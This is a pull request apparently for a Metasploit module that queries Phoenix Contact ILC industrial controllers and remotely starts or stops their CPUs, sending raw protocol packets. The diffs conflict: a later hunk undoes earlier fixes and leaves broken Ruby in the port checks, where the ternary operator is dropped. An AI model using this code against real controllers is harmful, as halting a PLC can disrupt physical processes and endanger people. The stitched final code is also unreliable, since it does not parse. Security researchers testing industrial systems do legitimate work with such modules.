### PR TITLE
Fix action port bug in phoenix_command

### DIFF
--- a/modules/auxiliary/admin/scada/phoenix_command.rb
+++ b/modules/auxiliary/admin/scada/phoenix_command.rb
@@ -138,6 +138,7 @@ class MetasploitModule < Msf::Auxiliary
     end
     state
   end
+
   def get_state2(data)
     if data[16..17] == '04'
       state = 'STOP'
@@ -149,6 +150,7 @@ class MetasploitModule < Msf::Auxiliary
     end
     state
   end
+ 
   def get_cpu(rhost, rport, devicetype)
     connect(true, 'RHOST' => rhost, 'RPORT' => rport)
     state = 'unknown'
@@ -158,7 +160,8 @@ class MetasploitModule < Msf::Auxiliary
       send_recv_once("\x01\x00\x02\x00\x00\x00\x1c\x00\x03\x00\x03\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x07\x00\x05\x00\x06\x00\x08\x00\x10\x00\x02\x00\x11\x00\x0e\x00\x0f\x00\r\x00\x16@\x16\x00")
       ## Query packet
       data = send_recv_once("\x01\x00\x02\x00\x00\x00\x08\x00\x03\x00\x03\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x40\x0b\x40")
-      state = get_state1(data)    elsif devicetype == '39x'
+      state = get_state1(data)
+    elsif devicetype == '39x'
       init_phase2
       data = send_recv_once("\xcc\x01\x00\x0f@\x07\x00\x00\xea\xfa")
       state = get_state2(data)
@@ -168,7 +171,8 @@ class MetasploitModule < Msf::Auxiliary
     state
   end
 
-  def set_cpu(rhost, rport, action, state, devicetype)    connect(true, 'RHOST' => rhost, 'RPORT' => rport)
+  def set_cpu(rhost, rport, action, state, devicetype)
+    connect(true, 'RHOST' => rhost, 'RPORT' => rport)
     if devicetype == '15x'
       init_phase1 ## Several packets (21)
       send_recv_once("\x01\x00\x02\x00\x00\x00\x1c\x00\x03\x00\x03\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x07\x00\x05\x00\x06\x00\x08\x00\x10\x00\x02\x00\x11\x00\x0e\x00\x0f\x00\r\x00\x16@\x16\x00")
@@ -178,7 +182,8 @@ class MetasploitModule < Msf::Auxiliary
       else
         print_status('--> Sending STOP now')
         send_recv_once("\x01\x00\x02\x00\x00\x00\x00\x00\x01\x00\x07\x00\x00\x00\x00\x00")
-      end    elsif devicetype == '39x'
+      end
+    elsif devicetype == '39x'
       init_phase2 ## Several packets (6)
       if action == 'START' || (action == 'REV' && state == 'STOP')
         print_status('--> Sending COLD start now')

--- a/modules/auxiliary/admin/scada/phoenix_command.rb
+++ b/modules/auxiliary/admin/scada/phoenix_command.rb
@@ -20,8 +20,8 @@ class MetasploitModule < Msf::Auxiliary
         It allows a remote user to read out the PLC Type, Firmware and
          Build number on port TCP/1962.
         And also to read out the CPU State (Running or Stopped) AND start
-         or stop the CPU on port TCP/20547 (confirmed ILC 15x and 17x series)
-         or on port TCP/41100 (confirmed ILC 39x series)
+         or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series)
+         or on port TCP/20547 (confirmed ILC 39x series)
       },
       'Author'         => 'Tijl Deneut <tijl.deneut[at]howest.be>',
       'License'        => MSF_LICENSE,
@@ -211,11 +211,11 @@ class MetasploitModule < Msf::Auxiliary
     if device.start_with?('ILC 15', 'ILC 17')
       devicetype = '15x'
       print_status('--> Detected 15x/17x series, getting current CPU state:')
-      ractionport == 0 ? (rport = 41100) : (rport = ractionport)
+      ractionport == nil ? (rport = 41100) : (rport = ractionport)
     elsif device.start_with?('ILC 39')
       devicetype = '39x'
       print_status('--> Detected 39x series, getting current CPU state:')
-      ractionport == 0 ? (rport = 20547) : (rport = ractionport)
+      ractionport == nil ? (rport = 20547) : (rport = ractionport)
     else
       print_error('Only ILC and (some) RFC devices are supported.')
       return

--- a/modules/auxiliary/admin/scada/phoenix_command.rb
+++ b/modules/auxiliary/admin/scada/phoenix_command.rb
@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Auxiliary
     end
     state
   end
- 
+
   def get_cpu(rhost, rport, devicetype)
     connect(true, 'RHOST' => rhost, 'RPORT' => rport)
     state = 'unknown'

--- a/modules/auxiliary/admin/scada/phoenix_command.rb
+++ b/modules/auxiliary/admin/scada/phoenix_command.rb
@@ -138,7 +138,6 @@ class MetasploitModule < Msf::Auxiliary
     end
     state
   end
-
   def get_state2(data)
     if data[16..17] == '04'
       state = 'STOP'
@@ -150,7 +149,6 @@ class MetasploitModule < Msf::Auxiliary
     end
     state
   end
-
   def get_cpu(rhost, rport, devicetype)
     connect(true, 'RHOST' => rhost, 'RPORT' => rport)
     state = 'unknown'
@@ -160,8 +158,7 @@ class MetasploitModule < Msf::Auxiliary
       send_recv_once("\x01\x00\x02\x00\x00\x00\x1c\x00\x03\x00\x03\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x07\x00\x05\x00\x06\x00\x08\x00\x10\x00\x02\x00\x11\x00\x0e\x00\x0f\x00\r\x00\x16@\x16\x00")
       ## Query packet
       data = send_recv_once("\x01\x00\x02\x00\x00\x00\x08\x00\x03\x00\x03\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x40\x0b\x40")
-      state = get_state1(data)
-    elsif devicetype == '39x'
+      state = get_state1(data)    elsif devicetype == '39x'
       init_phase2
       data = send_recv_once("\xcc\x01\x00\x0f@\x07\x00\x00\xea\xfa")
       state = get_state2(data)
@@ -171,8 +168,7 @@ class MetasploitModule < Msf::Auxiliary
     state
   end
 
-  def set_cpu(rhost, rport, action, state, devicetype)
-    connect(true, 'RHOST' => rhost, 'RPORT' => rport)
+  def set_cpu(rhost, rport, action, state, devicetype)    connect(true, 'RHOST' => rhost, 'RPORT' => rport)
     if devicetype == '15x'
       init_phase1 ## Several packets (21)
       send_recv_once("\x01\x00\x02\x00\x00\x00\x1c\x00\x03\x00\x03\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x07\x00\x05\x00\x06\x00\x08\x00\x10\x00\x02\x00\x11\x00\x0e\x00\x0f\x00\r\x00\x16@\x16\x00")
@@ -182,8 +178,7 @@ class MetasploitModule < Msf::Auxiliary
       else
         print_status('--> Sending STOP now')
         send_recv_once("\x01\x00\x02\x00\x00\x00\x00\x00\x01\x00\x07\x00\x00\x00\x00\x00")
-      end
-    elsif devicetype == '39x'
+      end    elsif devicetype == '39x'
       init_phase2 ## Several packets (6)
       if action == 'START' || (action == 'REV' && state == 'STOP')
         print_status('--> Sending COLD start now')
@@ -211,11 +206,11 @@ class MetasploitModule < Msf::Auxiliary
     if device.start_with?('ILC 15', 'ILC 17')
       devicetype = '15x'
       print_status('--> Detected 15x/17x series, getting current CPU state:')
-      ractionport == nil ? (rport = 41100) : (rport = ractionport)
+      ractionport.nil? (rport = 41100) : (rport = ractionport)
     elsif device.start_with?('ILC 39')
       devicetype = '39x'
       print_status('--> Detected 39x series, getting current CPU state:')
-      ractionport == nil ? (rport = 20547) : (rport = ractionport)
+      ractionport.nil? (rport = 20547) : (rport = ractionport)
     else
       print_error('Only ILC and (some) RFC devices are supported.')
       return


### PR DESCRIPTION
This PR fixes a bug in ```auxiliary/admin/scada/phoenix_command``` where the action port (datastore option ```RPORT```) was being checked against ```0``` and not ```nil```. When the option is unset, the action port is autodetected.